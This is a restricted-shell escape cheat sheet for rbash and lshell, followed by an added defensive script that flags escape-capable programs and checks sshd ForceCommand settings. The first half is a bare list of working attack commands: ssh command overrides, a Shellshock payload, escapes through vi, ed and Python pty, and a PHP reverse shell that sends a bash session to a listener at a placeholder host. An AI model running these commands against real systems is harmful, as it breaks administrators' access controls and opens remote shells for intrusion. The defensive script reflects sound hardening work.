rbash
- rbash escape | rbash restricted shell escape
- Escape Restricted Shell Environments on Linux
- Escape from Restricted Shells
echo $SHELL
List available commands
compgen -c
List directory content without ls
echo /home/username/*
Skip the bash profile
ssh username@x.x.x.x -t "bash --noprofile"
ssh username@x.x.x.x -t "/bin/sh"
Shellshock (only works against an unpatched bash)
ssh username@x.x.x.x -t "(){:;}; /bin/bash"
cannot specify `/' in command names
BASH_CMDS[a]=/bin/sh;a
export PATH="/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin"
python -c 'import pty;pty.spawn("/bin/bash")'
export PATH="/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin"
vi
vi
:set shell=/bin/bash
:shell
ed
cd /home
echo $SHELL
ed
!'/bin/bash'
pwd
PHP
nc -lvp 4444
php -r '$sock=fsockopen("x.x.x.x",4444);exec("/bin/bash -i <&3 >&3 2>&3");'
Lshell (limited shell)
Limited Shell (lshell) is a Python-based shell that restricts which commands users can run. See this page for other techniques.
help
cd clear echo exit help history ll lpath ls lsudo
Bypass
echo os.system('/bin/bash')
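
A defender-side check for the techniques listed above, as an added example that is not part of the original notes: it lists the programs in a restricted user's command directory that this page uses to reach a full shell, and tests whether sshd pins the user's session with ForceCommand so that a client-supplied command (the `ssh ... -t "..."` entries) is ignored. The directory layout, the user names and the `/usr/local/bin/menu` path are constructed, and the `Match User` handling is simplified.

```shell
#!/bin/sh
# Added example (not from the original notes); sample data is constructed.

# Programs this page uses to leave the restricted shell.
ESCAPE_BINS="vi ed python php bash sh nc ssh"

# risky_bins DIR: print each listed program found in the restricted user's
# command directory, including versioned names such as python3 or php7.4.
risky_bins() {
    for name in $ESCAPE_BINS; do
        for f in "$1/$name" "$1/$name"[0-9]*; do
            if [ -e "$f" ]; then basename "$f"; fi
        done
    done
}

# forces_command SSHD_CONFIG USER: succeed if a ForceCommand line applies to
# USER, globally or in a "Match User" block naming USER literally.
# Simplification: wildcards, other Match criteria and overrides are ignored.
forces_command() {
    awk -v user="$2" '
        BEGIN { scope = 1 }   # lines before the first Match apply to everyone
        { line = $0; sub(/^[ \t]+/, "", line)
          split(line, w, /[ \t]+/); key = tolower(w[1]) }
        key == "match" {
            scope = 0
            if (tolower(w[2]) == "user") {
                n = split(w[3], u, ",")
                for (i = 1; i <= n; i++) if (u[i] == user) scope = 1
            }
        }
        key == "forcecommand" && scope { found = 1 }
        END { exit !found }
    ' "$1"
}

# Constructed sample: a command directory and an sshd_config fragment.
demo=$(mktemp -d)
mkdir "$demo/bin"
touch "$demo/bin/ls" "$demo/bin/vi" "$demo/bin/python3"
printf 'Match User backup\n    ForceCommand /usr/local/bin/menu\n' > "$demo/sshd_config"
echo "escape-capable programs: $(risky_bins "$demo/bin" | tr '\n' ' ')"
for u in backup guest; do
    if forces_command "$demo/sshd_config" "$u"; then
        echo "$u: ForceCommand set, client-supplied ssh command is ignored"
    else
        echo "$u: no ForceCommand, client-supplied ssh command will run"
    fi
done
rm -rf "$demo"
```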